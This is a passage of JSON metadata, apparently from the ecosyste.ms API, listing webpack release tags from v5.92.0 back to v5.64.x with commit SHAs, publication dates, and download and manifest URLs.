ste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.